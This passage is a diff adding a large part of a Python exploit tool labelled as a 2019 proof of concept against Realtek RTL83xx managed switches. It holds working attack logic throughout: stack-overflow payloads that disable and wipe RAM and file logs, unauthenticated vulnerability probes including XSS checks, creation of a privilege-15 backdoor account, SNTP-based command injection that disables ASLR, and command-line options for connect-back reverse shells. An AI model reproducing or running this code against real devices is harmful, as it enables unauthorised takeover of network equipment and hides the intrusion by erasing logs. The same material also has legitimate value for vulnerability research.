+			DEBUG("RECV",response.read())
+
+			if self.target['exploit']['stack_cgi_log']['log_settings_set_SIGSEGV']:
+				logging.failure("Disable: Failed!")
+				return False
+
+			if self.Workaround:
+				self.Workaround_logout()
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				logging.status("Disabled")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				logging.failure(str(e))
+				return False
+
+		try:
+			# clean ram log
+			time.sleep(1)
+			logging.status("Trying to clean ramlog")
+			query_args = self.target['exploit']['stack_cgi_log']['content']
+			query_args = query_args.replace("_JUMP_", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_ramClear'] + 0x58000000) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_log']['log_ramClear_cmd'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+
+			if self.target['exploit']['stack_cgi_log']['log_ramClear_SIGSEGV']:
+				logging.failure("Clean RAM: Failed!")
+				return False
+			if self.Workaround:
+				self.Workaround_logout()
+			logging.status("Cleaned")
+
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				logging.status("Cleaned")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				logging.failure(str(e))
+				return False
+
+		try:
+			# clean file log
+			time.sleep(1)
+			logging.status("Trying to clean filelog")
+			query_args = self.target['exploit']['stack_cgi_log']['content']
+			query_args = query_args.replace("_JUMP_", struct.pack('>L',self.target['exploit']['stack_cgi_log']['log_fileClear'] + 0x58000000) ) # 0x58 will be overwritten
+			query_args = query_args.replace("_CMD_",self.target['exploit']['stack_cgi_log']['log_fileClear_cmd'])
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			DEBUG("RECV",response.read())
+
+			if self.target['exploit']['stack_cgi_log']['log_fileClear_SIGSEGV']:
+				logging.failure("Clean FILE: Failed!")
+				return False
+			if self.Workaround:
+				self.Workaround_logout()
+			logging.status("Cleaned")
+
+		except Exception as e:
+			DEBUG("RECV",str(e))
+			if e.code == 502:
+				logging.status("Cleaned")
+				if self.Workaround:
+					self.Workaround_logout()
+				pass
+			else:
+				logging.failure(str(e))
+				return False
+
+		if self.Workaround:
+			self.Workaround_logout()
+
+		logging.success("Success")
+
+		return True
+
+	#
+	# Access: Unauthorized
+	#
+	def verify_target(self,target,check_all):
+		self.target = target
+		self.check_all = check_all
+
+		self.headers['Content-Type'] = "multipart/form-data; boundary=-------"
+
+		self.Workaround = self.target['exploit']['heack_cgi_shell']['workaround']
+
+		sorted_dict = OrderedDict(sorted(self.target['verify'].items(), key=lambda t: t[0])) # sorted by key
+		for check in sorted_dict:
+
+			if self.Workaround:
+				self.Workaround_logout()
+			#
+			# If we will try exploit, verify only that CGI
+			#
+			if not self.check_all:
+				check = self.target['exploit']['heack_cgi_shell']['cgi']
+
+			cgi = log.progress("{:.<30}".format(check))
+
+			if not len(self.target['verify'][check]['content']) == 0:
+				if self.target['verify'][check]['Content-Type']:
+					query_args = "Content-Type\n\n" + self.target['verify'][check]['content']
+				else:
+					query_args = self.target['verify'][check]['content']
+
+			if not self.target['verify'][check]['safe']:
+				cgi.success("Vulnerable ({})".format(self.target['verify'][check]['content']))
+				continue
+
+			URI = self.target['verify'][check]['uri']
+
+			if target.get('hash_uri'):
+				URI += self.netgear_hash(URI)
+
+			try:
+				if not len(self.target['verify'][check]['content']) == 0:
+					DEBUG("SEND",(URI, query_args))
+
+					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+				else:
+					DEBUG("SEND",URI)
+
+					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+
+				if self.target['verify'][check]['response'] == 'json':
+					result = json.loads(response.read())
+					DEBUG("RECV",result)
+
+					if result['result'] == 1 and result['msg'] == "Invalid file format.":
+						cgi.success("Vulnerable ({})".format(result['msg']))
+						if not self.check_all:
+							return True
+					else:
+						cgi.failure("NOT Vulnerable")
+						if not self.check_all:
+							return False
+
+				elif self.target['verify'][check]['response'] == 'xss':
+					response = re.split('["?=&<>]',response.read())	# bummer to split out '<>''
+					DEBUG("RECV",response)
+
+					count = 0
+					for content in range(0,len(response)):
+						if response[content] == self.target['verify'][check]['content_check']:
+							cgi.success("Vulnerable")
+							if not self.check_all:
+								return True
+						else:
+							#
+							# Since we split out '<>' above, make sure to count in 'script' and '/script'
+							#
+							if response[content] == 'alert(XSS);' and response[content-1] == 'script' and response[content+1] == '/script':
+								count += 1
+					if count:
+						cgi.success("Vulnerable (XSS: {})".format(count))
+						if not self.check_all:
+							return True
+					else:
+						cgi.failure("NOT Vulnerable")
+						if not self.check_all:
+							return False
+
+				elif self.target['verify'][check]['response'] == 'html':
+					response = re.split("['()<>\n:,.&=]",response.read())
+					DEBUG("RECV",response)
+
+					for content in range(0,len(response)):
+						if response[content] == self.target['verify'][check]['content_check'] or response[content] == 'Image CRC32 Error':
+							cgi.success("Vulnerable ({})".format(response[content]))
+							if not self.check_all:
+								return True
+						#
+						# We checking what will be returned from the request
+						# 1. The error message is correct
+						# 2. LEN of our 'content' matching reported LEN from target
+						#
+						elif response[content] == 'errkey':
+							if response[content+1] == self.target['verify'][check]['content_check'] and int(response[content+3]) == int(len(self.target['verify'][check]['content'])):
+								cgi.success("Vulnerable ({})".format(response[content+1]))
+								if not self.check_all:
+									return True
+							else:
+								cgi.failure("NOT Vulnerable")
+								if not self.check_all:
+									return False
+				
+				elif self.target['verify'][check]['response'] == 'file':
+					if self.target['verify'][check]['check_uri']:
+						try:
+							time.sleep(1) # Some checks needs to have some time
+							URI = self.target['verify'][check]['check_uri']
+							DEBUG("SEND",URI)
+
+							response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+							response = response.read()
+							DEBUG("RECV",response)
+
+							if response == self.target['verify'][check]['content_check']:
+								cgi.success("Vulnerable ({})".format(response))
+								if not self.check_all:
+									return True
+							else:
+								cgi.failure("NOT Vulnerable")
+								if not self.check_all:
+									return False
+
+						except Exception as e:
+							cgi.failure(str(e))
+							return False
+					else:
+						cgi.failure("Not vulnerable")
+						if not self.check_all:
+							return False
+
+				cgi.failure("Not vulnerable")
+				if not self.check_all:
+					return False
+
+			except Exception as e:
+				DEBUG("RECV",str(e))
+				if e.code == 502:
+					cgi.success("Vulnerable ({})".format(e))
+					if not self.check_all:
+						return True
+					pass
+				else:
+					cgi.failure(str(e))
+					return False
+
+		return True
+
+	#
+	# Access: Unauthorized
+	#
+	def check_remote(self,etag):
+		self.manualETag = etag
+
+		remote = log.progress("Target")
+
+		if self.manualETag:
+			if self.manualETag == 'help':
+				print ""
+				remote.success("List of known targets")
+			elif self.manualETag == 'info':
+				print ""
+				remote.success("Brief information of known targets")
+
+			target = Vendor(self.manualETag).dict()
+			if target:
+				remote.success("{} ({} v{})".format(target['vendor'],target['model'],target['version']))
+				return target
+			else:
+				remote.failure("Unknown ({})".format(self.manualETag))
+				return False
+
+		remote.status("Checking")
+		URI = '/'
+		DEBUG("SEND",URI)
+
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded
+		result = response.read().split()
+		DEBUG("RECV",result)
+
+		#
+		# Use HTTP ETag to identify remote vendor and FW version, to choose right code/gadgets
+		#
+		self.ETag = response.info().get('ETag').replace('"','')
+		DEBUG("RECV",response.info())
+
+		target = Vendor(self.ETag).dict()
+		if not target:
+			remote.failure("Unknown ({})".format(self.ETag))
+			return False
+
+		if target:
+			remote.success("{} ({} v{})".format(target['vendor'],target['model'],target['version']))
+			if target['info_leak']:
+				info_leak = log.progress("Model")
+				URI = target['info_leak_uri']
+				DEBUG("SEND",URI)
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded
+				response = response.read()
+
+				if target['info_leak_JSON']:
+					result = json.loads(response)
+					DEBUG("RECV",response)
+					tmp = result.get('data')
+					if tmp.get('description'):
+						info_leak.success(result['data']['description'])
+					elif tmp.get('productName'):
+						info_leak.success(result['data']['productName'])
+					elif tmp.get('title'):
+						info_leak.success(result['data']['title'])
+					else:
+						info_leak.failure("Failed")
+				else:
+					response = re.split('[()<>\n:,.;=" ]',response)
+					DEBUG("RECV",response)
+					for check in range(0,len(response)):
+						if response[check] == 'modelName':
+							info_leak.success(response[check+2])
+							return target
+					info_leak.failure("Not found")
+					print response
+
+			return target
+
+	#
+	# Access: Unauthorized
+	#
+	def add_user(self,target):
+		self.target = target
+
+		add = log.progress("Adding credentials")
+
+		if not self.target['exploit']['priv15_account']['vulnerable']:
+			add.failure("Not listed as vulnerable")
+			if self.target['exploit']['stack_cgi_add_account']['vulnerable']:
+				return self.stack_add_account(self.target)
+			else:
+				return False
+
+		USERNAME = self.credentials.split(':')[0]
+
+		if USERNAME == 'admin' or USERNAME == 'cisco':
+			log.failure("[bad boy] Username '{}' shall not be changed!".format(USERNAME))
+			return False
+
+		if target['exploit']['priv15_account']['encryption'] == 'md5':
+			PASSWORD = self.md5hash(self.credentials.split(':')[1], base64encode=True)
+		elif target['exploit']['priv15_account']['encryption'] == 'clear':
+			PASSWORD = self.credentials.split(':')[1]
+		elif target['exploit']['priv15_account']['encryption'] == 'nopassword':
+			PASSWORD = 'nopassword' # dummy
+		else:
+			log.failure("No password type")
+			return False
+
+		query_args = self.target['exploit']['priv15_account']['content']
+		query_args = query_args.replace('USERNAME',USERNAME)
+		query_args = query_args.replace('PASSWORD',PASSWORD)
+
+		log.info("Credentials: {}/{}".format(USERNAME,PASSWORD))
+
+		try:
+			add.status("Trying...")
+			URI = target['exploit']['priv15_account']['add_uri']
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			response = response.read().split()
+			DEBUG("RECV",response)
+			for check in range(0,len(response)):
+				if response[check] == 'init(){fileLoadWait();' or response[check] == 'id="reason">Merging' or response[check] == '(tmpStr.indexOf("FlashWriteDone")':
+					add.success("Success")
+					time.sleep(5) # Wait a bit so the account will be merged
+					return True
+
+		except Exception as e:
+			add.failure("error {}".format(e))
+			return False
+
+		add.failure("Failed")
+		print response
+		return False
+
+	#
+	# Access: Authenticated
+	#
+	def del_user(self, target):
+		self.target = target
+
+		if not self.target['exploit']['priv15_account']['vulnerable']:
+			remove.failure("Not listed as vulnerable")
+			if self.target['exploit']['stack_cgi_del_account']['vulnerable']:
+				return self.stack_del_account(self.target)
+			else:
+				return False
+
+		USERNAME = self.credentials.split(':')[0]
+		remove = log.progress("Remove credentials for {}".format(USERNAME))
+
+		if USERNAME == 'admin' or USERNAME == 'cisco':
+			remove.failure("[bad boy] Username '{}' shall not be deleted!".format(USERNAME))
+			return False
+
+		if self.check_XSID(self.target):
+			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)
+
+		try:
+			remove.status("Trying...")
+
+			URI = target['exploit']['priv15_account']['del_uri']
+
+			if len(self.target['exploit']['priv15_account']['del_query']) >= 1:
+				query_args = self.target['exploit']['priv15_account']['del_query']
+				query_args = query_args.replace('USERNAME',USERNAME)
+				DEBUG("SEND",(URI, query_args))
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+				result = response
+			else:
+				URI = URI.replace('USERNAME',USERNAME)
+				DEBUG("SEND",URI)
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+				result = response
+				response = response.read()
+				DEBUG("RECV",response)
+
+			if not self.target['exploit']['priv15_account']['json']:
+				if result.code == 200 and len(response) == 0:
+					remove.success("Success")
+					return True
+
+				response = response.split("'")
+				DEBUG("RECV",response)
+
+				for check in range(0,len(response)):
+					if response[check] == ': The user is not exist!!<br>' or response[check] == 'Error String':
+						remove.failure("User do not exist")
+						self.logout(self.target)
+						return False
+				remove.failure("Failed")
+				self.logout(self.target)
+				return False
+			else:
+				result = json.loads(response.read())
+				DEBUG("RECV",result)
+
+				if result['status'] == 'ok' and result['msgType'] == 'save_success':
+					remove.success("Success")
+					return True
+
+		except Exception as e:
+			log.info("error {}".format(e))
+			return False
+
+		remove.failure("Failed")
+		print result
+		return False
+
+	#
+	# Access: Authenticated
+	#
+	def logout(self, target):
+		self.target = target
+
+		logout = log.progress("Logging out")
+
+		if not self.target['login']['vulnerable']:
+			logout.failure("Not listed as vulnerable")
+			return False
+
+		logout.status("Trying...")
+
+		if self.check_XSID(self.target):
+			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)
+
+		URI = self.target['login']['logout_uri']
+		DEBUG("SEND",URI)
+
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,True) # encoded
+		response = response.read()
+		if not self.target['login']['json']:
+			response = response.split()
+			DEBUG("RECV",response)
+
+			for check in range(0,len(response)):
+				if response[check] == 'function goback(){' or response[check] == 'onload="goback();">': 
+					logout.success("Success")
+					return True
+
+			logout.failure("Failed")
+			return False
+
+		else:
+			result = json.loads(response)
+			DEBUG("RECV",result)
+
+			if result['status'] == 'ok' and result['msgType'] == 'success' or result['status'] == 'ok' and result['msgType'] == 'save_success':
+				logout.success("Success")
+				return True
+			else:
+				logout.failure("Failed")
+				print result
+				return False
+
+	#
+	# Access: Authenticated
+	#
+	def login(self,target):
+		self.target = target
+
+		login = log.progress("Login")
+
+		if not self.target['login']['vulnerable']:
+			login.failure("Not listed as vulnerable")
+			return False
+
+		#
+		# login
+		#
+		try:
+			USERNAME = self.credentials.split(':')[0]
+
+			if self.target['login']['encryption'] == 'rsa':
+				PASSWORD = self.RSA_Password(self.credentials.split(':')[1])
+			elif self.target['login']['encryption'] == 'caesar':
+				PASSWORD = self.caesar_encode(self.credentials.split(':')[1])
+			elif self.target['login']['encryption'] == 'encode':
+				PASSWORD = self.obfuscation_encode(self.credentials.split(':')[1])
+			elif self.target['login']['encryption'] == 'clear':
+				PASSWORD = self.credentials.split(':')[1]
+			else:
+				login.failure("No login password matching")
+				return False
+
+			query_args = self.target['login']['query']
+			query_args = query_args.replace('USERNAME',USERNAME)
+			query_args = query_args.replace('PASSWORD',PASSWORD)
+
+			URI = self.target['login']['login_uri']
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			response = response.read()
+			if not self.target['login']['json']:
+				response = response.split()
+				DEBUG("RECV",response)
+
+				for check in range(0,len(response)):
+					if response[check] == 'top.location.replace("/cgi-bin/dispatcher.cgi?cmd=1")' or response[check] == 'href="/cgi-bin/dispatcher.cgi?cmd=5890':
+						login.success("Success")
+						return True
+					elif response[check] == 'window.location.replace("/cgi-bin/dispatcher.cgi?cmd=3");':
+						login.success("Already logged in")
+						return True
+					elif response[check] == 'top.location.replace("/cgi-bin/dispatcher.cgi?cmd=5")':
+						login.failure("Failed")
+						return False
+					elif len(response) == check + 1:
+						login.failure("Not supported device")
+						print response
+						return False
+			else:
+				result = json.loads(response)
+				DEBUG("RECV",result)
+
+				if result['status'] == 'ok' and result['msgType'] == 'save_success' or result['status'] == 'ok' and result['msgType'] == 'success':
+					login.status("Verifying")
+					URI = self.target['login']['status_uri']
+					DEBUG("SEND",URI)
+
+					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+					response = response.read()
+					result = json.loads(response)
+					DEBUG("RECV",result)
+
+					if result['data']['status'] == 'ok':
+						login.success("Success")
+						return True
+					elif result['data']['status'] == 'authing':
+						time.sleep(2)
+						# try one more time
+						URI = self.target['login']['status_uri']
+						login.status("One more time...")
+						DEBUG("SEND",URI)
+
+						response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+						response = response.read()
+						result = json.loads(response)
+						DEBUG("RECV",result)
+
+						if result['data']['status'] == 'ok':
+							login.success("Success")
+							return True
+						else:
+							login.failure("Failed (Authing)")
+							return False
+					elif result['data']['status'] == 'fail':
+						login.failure("Failed {}".format(result['data']['failReason']))
+						return False
+
+		except Exception as e:
+
+			login.failure("error {}".format(e))
+
+		return False
+
+	#
+	# Access: Authenticated
+	#
+	def disable_clean_log(self, target):
+		self.target = target
+
+		clear_log = log.progress("Logging disable & clean")
+
+		if not self.target['log']['vulnerable']:
+			clear_log.failure("Not listed as vulnerable")
+			return False
+
+		if self.check_XSID(self.target):
+			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)
+
+		try:
+			clear_log.status("Trying to disable")
+
+			URI = self.target['log']['disable_uri']
+			query_args = self.target['log']['disable_query']
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			response = response.read()
+			DEBUG("RECV",response)
+
+			URI = self.target['log']['status']
+			DEBUG("SEND",URI)
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+			response = response.read()
+			if not self.target['log']['json']:
+				response = re.split("[<>\n]",response)
+				DEBUG("RECV",response)
+
+				for check in range(0,len(response)):
+					if response[check] == 'window.location.replace("/cgi-bin/dispatcher.cgi?cmd=5120");':
+						clear_log.status("Disabled")
+						break
+			else: # json
+				result = json.loads(response)
+				DEBUG("RECV",result)
+
+				if result['data']['logState'] == False:
+					clear_log.status("Disabled")
+				else:
+					clear_log.failure("Logging still enabled")
+					return False
+
+			clear_log.status("Trying to clean")
+
+			URI = self.target['log']['clean_logfile_uri']
+			query_args = self.target['log']['clean_logfile_query']
+			DEBUG("SEND",(URI, query_args))
+
+			response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+			response = response.read()
+			if not self.target['log']['json']:
+				response = re.split("[<>'\n]",response)
+				DEBUG("RECV",response)
+
+				for check in range(0,len(response)):
+					if response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':
+						clear_log.status("Disabled")
+						URI = self.target['log']['clean_logmem_uri']
+						query_args = self.target['log']['clean_logmem_query']
+						DEBUG("SEND",(URI, query_args))
+
+						response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+						response = response.read()
+						response = re.split("[<>'\n]",response)
+						DEBUG("RECV",response)
+
+						for check in range(0,len(response)):
+							if response[check] == '/cgi-bin/dispatcher.cgi?cmd=5129' or response[check] == '/cgi-bin/dispatcher.cgi?cmd=4361':
+								clear_log.success("Success")
+								return True
+						break
+				clear_log.failure("Failed")
+				return False
+			else: # json
+				result = json.loads(response)
+				DEBUG("RECV",result)
+
+				if result['status'] == 'ok' and result['msgType'] == 'save_success':
+					URI = self.target['log']['clean_logmem_uri']
+					query_args = self.target['log']['clean_logmem_query']
+					DEBUG("SEND",(URI, query_args))
+
+					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+					response = response.read()
+					result = json.loads(response)
+					DEBUG("RECV",result)
+
+					if result['status'] == 'ok' and result['msgType'] == 'save_success':
+						clear_log.success("Success")
+						return True
+					else:
+						clear_log.failure("Failed")
+						return False
+				else:
+					clear_log.failure("Failed")
+					return False
+
+		except Exception as e:
+			log.info("error {}".format(e))
+			return False
+
+		clear_log.failure("LOG Failed")
+		return False
+
+	#
+	# Access: Authenticated
+	#
+	def SNTP(self, target):
+		self.target = target
+
+		SNTP = log.progress("SNTP")
+
+		if not self.target['exploit']['sntp']['vulnerable']:
+			SNTP.failure("Not listed as vulnerable")
+			return False
+
+		SNTP.status("Trying...")
+
+		if self.check_XSID(self.target):
+			self.headers['X-CSRF-XSID'] = self.Cisco_XSID(self.target)
+
+		SNTP.status("Enable SNTP")
+
+		URI = self.target['exploit']['sntp']['enable_uri']
+		query_args = self.target['exploit']['sntp']['enable_query']
+
+		DEBUG("SEND",(URI, query_args))
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+		response = response.read()
+
+		if not self.target['exploit']['sntp']['json']:
+			response = re.split("[<>\n]",response)
+			DEBUG("RECV",response)
+
+			for check in range(0,len(response)):
+				if response[check] == 'SNTP':
+					if response[check+5] == 'Enabled' or response[check+5] == 'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':
+						SNTP.status("SNTP Enabled")
+					elif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':
+						SNTP.failure("SNTP Disabled")
+						return False
+					else:
+						SNTP.failure("Enable SNTP Failed")
+						return False
+
+		else: # json
+			response = self.clean_json(response)
+			result = json.loads(response)
+			DEBUG("RECV",result)
+
+			if result['status'] == 'ok' and result['msgType'] == 'save_success':
+				URI = self.target['exploit']['sntp']['status_uri']
+				DEBUG("SEND",URI)
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+				response = response.read()
+				response = self.clean_json(response)
+				result = json.loads(response)
+				DEBUG("RECV",result)
+
+				for status in result['data']:
+					if status == 'sntp' and result['data']['sntp'] == True:
+						SNTP.status("SNTP Enabled")
+						break
+					elif status == 'sntp' and result['data']['sntp'] == False:
+						SNTP.failure("SNTP Disabled")
+						return False
+					elif status == 'sntpStatus' and result['data']['sntpStatus'] == True:
+						SNTP.status("SNTP Enabled")
+						break
+					elif status == 'sntpStatus' and result['data']['sntpStatus'] == False:
+						SNTP.failure("SNTP Disabled")
+						return False
+
+			else:
+				SNTP.failure("Enable SNTP Failed")
+				return False
+
+		URI = self.target['exploit']['sntp']['inject_uri']
+		query_args = self.target['exploit']['sntp']['inject_query']
+		DEBUG("SEND",(URI, query_args))
+
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+		response = response.read()
+		if not self.target['exploit']['sntp']['json']:
+			response = response.split('"')
+			DEBUG("RECV",response)
+
+			for check in range(0,len(response)):
+				if response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':
+					query_args = self.target['exploit']['sntp']['check_query']
+					DEBUG("SEND",(URI, query_args))
+
+					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+					response = response.read()
+					response = response.split('"')
+					DEBUG("RECV",response)
+
+					for check in range(0,len(response)):
+						if response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':
+							URI = self.target['exploit']['sntp']['verify_uri']
+							DEBUG("SEND",URI)
+
+							response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+							response = response.read().split()
+							DEBUG("RECV",response)
+
+							if response[0] == '0':
+								SNTP.status("ASLR disabled")
+								break
+							else:
+								SNTP.failure("Check Failed")
+								return False
+					break
+
+
+		else: # json
+			response = self.clean_json(response)
+			result = json.loads(response)
+			DEBUG("RECV",result)
+
+			if result['status'] == 'ok' and result['msgType'] == 'save_success':
+				query_args = self.target['exploit']['sntp']['check_query']
+				DEBUG("SEND",(URI, query_args))
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+				response = response.read()
+				response = self.clean_json(response)
+				result = json.loads(response)
+				DEBUG("RECV",result)
+
+				if result['status'] == 'ok' and result['msgType'] == 'save_success':
+					URI = self.target['exploit']['sntp']['verify_uri']
+					DEBUG("SEND",URI)
+
+					response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+					response = response.read().split()
+					DEBUG("RECV",response)
+
+					if response[0] == '0':
+						SNTP.status("ASLR disabled")
+					else:
+						SNTP.failure("Check Failed")
+						return False
+				else:
+					SNTP.failure("RCE #2 Failed")
+					return False
+			else:
+				SNTP.failure("RCE #1 Failed")
+				return False
+
+		SNTP.status("Removing RCE")
+		URI = self.target['exploit']['sntp']['delete_uri']
+		query_args = self.target['exploit']['sntp']['delete_query']
+		DEBUG("SEND",(URI, query_args))
+
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+		response = response.read()
+		if not self.target['exploit']['sntp']['json']:
+			response = response.split('"')
+			DEBUG("RECV",response)
+
+			for check in range(0,len(response)):
+				if response[check] == '/cgi-bin/dispatcher.cgi?cmd=549':
+					SNTP.status("RCE Removed")
+					break
+		else: # json
+			response = self.clean_json(response)
+			result = json.loads(response)
+			DEBUG("RECV",result)
+
+			if result['status'] == 'ok' and result['msgType'] == 'save_success':
+				SNTP.status("RCE Removed")
+			else:
+				SNTP.failure("RCE Remove Failed")
+				return False
+
+		URI = self.target['exploit']['sntp']['disable_uri']
+		query_args = self.target['exploit']['sntp']['disable_query']
+		DEBUG("SEND",(URI, query_args))
+
+		response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,query_args,None,False) # not encoded
+		response = response.read()
+		if not self.target['exploit']['sntp']['json']:
+			response = re.split("[<>\n]",response)
+			DEBUG("RECV",response)
+
+			for check in range(0,len(response)):
+				if response[check] == 'SNTP':
+
+					if response[check+5] == 'Enabled' or response[check+5] == 'Enable' or response[check+7] == 'Enabled' or response[check+7] == 'Enable':
+						SNTP.failure("SNTP Enabled")
+					elif response[check+5] == 'Disabled' or response[check+5] == 'Disable' or response[check+7] == 'Disabled' or response[check+7] == 'Disable':
+						SNTP.status("SNTP Disabled")
+					else:
+						SNTP.failure("Disable SNTP Failed")
+						return False
+
+		else: # json
+			response = self.clean_json(response)
+			result = json.loads(response)
+			DEBUG("RECV",result)
+
+			if result['status'] == 'ok' and result['msgType'] == 'save_success':
+				URI = self.target['exploit']['sntp']['status_uri']
+				DEBUG("SEND",URI)
+
+				response = HTTPconnect(rhost,proto,verbose,creds,raw_request).Send(URI,self.headers,None,None,False) # not encoded
+				response = response.read()
+				response = self.clean_json(response) # MCW TEST
+				result = json.loads(response)
+				DEBUG("RECV",result)
+
+				for status in result['data']:
+					if status == 'sntp' and result['data']['sntp'] == True:
+						SNTP.failure("SNTP Enabled")
+						return False
+					elif status == 'sntp' and result['data']['sntp'] == False:
+						SNTP.status("SNTP Disabled")
+						break
+					elif status == 'sntpStatus' and result['data']['sntpStatus'] == True:
+						SNTP.failure("SNTP Enabled")
+						return False
+					elif status == 'sntpStatus' and result['data']['sntpStatus'] == False:
+						SNTP.status("SNTP Disabled")
+						break
+
+			else:
+				SNTP.failure("Disable SNTP Failed")
+				return False
+
+
+		SNTP.success("ASLR: Success")
+		return True
+
+
+
+if __name__ == '__main__':
+
+	#
+	# Help, info and pre-defined values
+	#	
+	INFO =  'Realtek Managed Switch Controller RTL83xx PoC (2019 bashis)\n'
+	HTTP = "http"
+	HTTPS = "https"
+	proto = HTTP
+	verbose = False
+	raw_request = True
+	rhost = '192.168.57.20'	# Default Remote HOST
+	rport = '80'			# Default Remote PORT
+	lhost = '192.168.57.1'	# Default Local HOST
+	lport = '1337'			# Default Local PORT
+	creds = 'pwn:pwn'		# creds = 'user:pass'
+	etag = ''
+
+	#
+	# Try to parse all arguments
+	#
+	try:
+		arg_parser = argparse.ArgumentParser(
+		prog=sys.argv[0],
+				description=('[*] '+ INFO +' [*]'))
+		arg_parser.add_argument('--rhost', required=False, help='Remote Target Address (IP/FQDN) [Default: '+ rhost +']')
+		arg_parser.add_argument('--rport', required=False, help='Remote Target HTTP/HTTPS Port [Default: '+ rport +']')
+		arg_parser.add_argument('--lhost', required=False, help='Connect Back Address (IP/FQDN) [Default: '+ lhost +']')
+		arg_parser.add_argument('--lport', required=False, help='Connect Back Port [Default: '+ lport + ']')
+		if creds:
+			arg_parser.add_argument('--auth', required=False, help='Basic Authentication [Default: '+ creds + ']')
+		arg_parser.add_argument('--https', required=False, default=False, action='store_true', help='Use HTTPS for remote connection [Default: HTTP]')
+
+		arg_parser.add_argument('--hydra', required=False, default=False, action='store_true', help='Boa/Hydra Web Server - reverse shell')
+		arg_parser.add_argument('--force', required=False, default=False, action='store_true', help='Ignore warnings for exploits marked not safe')
+		arg_parser.add_argument('--etag', required=False, help='Select target manually with their ETag')
+
+		arg_parser.add_argument('--shell', required=False, default=False, action='store_true', help='Unauthenticated - reverse shell - CGIs')
+
+		arg_parser.add_argument('--debug', required=False, default=False, action='store_true', help='Debug SEND/RECV data and line numbers in code')
+
+		arg_parser.add_argument('--verify', required=False, default=False, action='store_true', help='Verify unauthenticated vulnerabilities - CGIs')
+		arg_parser.add_argument('--report', required=False, default=False, action='store_true', help='Generate report based on dictionary')
+
+		arg_parser.add_argument('--adduser', required=False, default=False, action='store_true', help='Add "'+ creds + '" with privilege 15')
+		arg_parser.add_argument('--deluser', required=False, default=False, action='store_true', help='Delete "'+ creds + '" credentials')
+
+		args = arg_parser.parse_args()
+	except Exception as e:
+		log.info(INFO)
+		log.info("Error: {}".format(e))
+		sys.exit(1)
+
+	# We want at least one argument, so print out help
+	if len(sys.argv) == 1:
+		arg_parser.parse_args(['-h'])
+
+	print ""
+	log.info(INFO)
+
+	if args.report:
+		Vendor("report").dict()
+		sys.exit(0)
+
+	if args.debug:
+		debug = True
+
+	if args.force:
+		force = True
+	#
+	# Check validity, update if needed, of provided options
+	#
+	if args.https:
+		proto = HTTPS
+		if not args.rport:
+			rport = '443'
+
